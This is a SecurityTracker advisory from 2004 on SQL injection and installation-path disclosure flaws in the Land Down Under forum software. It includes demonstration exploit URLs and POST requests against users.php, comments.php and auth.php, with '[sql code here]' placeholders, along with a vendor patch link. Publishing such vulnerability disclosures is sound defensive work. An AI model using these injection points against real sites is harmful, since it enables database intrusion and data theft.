SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   Land Down Under Vendors:   ldu.neocrome.net
Land Down Under Input Validation Holes in 'users.php' and Other Scripts Let Remote Users Inject SQL Commands
SecurityTracker Alert ID:  1012015
SecurityTracker URL:  http://securitytracker.com/id/1012015
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Nov 1 2004
Impact:   Disclosure of system information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 701
Description:   Some input validation vulnerabilities were reported in Land Down Under. A remote user can inject SQL commands and can determine the installation path.

Positive Technologies reported that 'users.php' does not properly validate user-supplied input in several variables. A remote user can inject SQL commands. The vendor reports that not all of the input validation flaws actually permit SQL injections.

Some demonstration exploit examples are provided:

/users.php?f=1&s=1'[sql code here]&w=asc&d=50
/users.php?f=1&s=name&w=1'[sql code here]&d=50
/users.php?f=1&s=name&w=asc&d=1'[sql code here]
/users.php?f=1&s=1'[sql code here]&w=asc
/users.php?f=1&s=name&w=1'[sql code here]
/comments.php?id=1"[sql code here]

It is also reported that 'auth.php' allows SQL injection via POST commands. Some demonstration exploit examples are provided:

POST /auth.php?m=register&a=add HTTP/1.1

Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 123

rusername="[sql code here]&remail=scanner@ptsecurity.com&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&

POST /auth.php?m=register&a=add HTTP/1.1

Host: www.neocrome.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 102

rusername=1&remail="[sql code here]&rpassword1=1&rpassword2=1&rlocation=1&roccupation=1&ruserwebsite=1&x=1&rcountry=1
;

It is also reported that a remote user can supply the following type of URL to determine the installation path:

/plug.php?h=1'

Impact:   A remote user can inject SQL commands to be executed by the underlying database.

A remote user can determine the installation path.

Solution:   The vendor has issued a patch for version 701, available at:

http://www.neocrome.net/index.php?msingle&id91

Vendor URL:  www.neocrome.net/index.php?msingle&id91 (Links to External Site)
Cause:   Exception handling error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents



[Original Message Not Available for Viewing]


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2020, SecurityGlobal.net LLC